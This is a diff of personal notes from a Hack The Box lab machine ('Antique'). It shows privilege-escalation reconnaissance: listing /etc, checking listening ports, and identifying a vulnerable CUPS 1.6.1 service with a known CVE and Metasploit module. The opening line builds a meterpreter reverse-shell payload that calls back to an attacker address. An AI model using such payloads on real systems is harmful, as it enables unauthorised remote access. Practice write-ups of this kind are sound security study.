dontARPmebro/hfm/Appendix C - Operational Notes/HTB/In Progress/Antique/Op Notes.md

 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.15.64 LPORT=1337 -f ELF > shell
 ```

-## Priv Esc
+## Privilege Escalation

-ls -lah /etc/
+`ls -lah /etc/`
 cups stood out to me.
 ![[Pasted image 20240831104656.png]]

-ss -antp
+`ss -antp`
 tells me there's website running
 ![[Pasted image 20240831104735.png]]

-i tried portfwd in metasploit but it didn't work. so I curled the website on the victim system which got me the cups version. from there i reaseared CUPS v1.6.1 and found a CVE, PoC, and a metasploit module
+i tried portfwd in metasploit but it didn't work. so I curled the website on the victim system which got me the cups version. from there i reassured CUPS v1.6.1 and found a CVE, PoC, and a metasploit module

 ![[Pasted image 20240831104841.png]]
 ![[Pasted image 20240831104856.png]]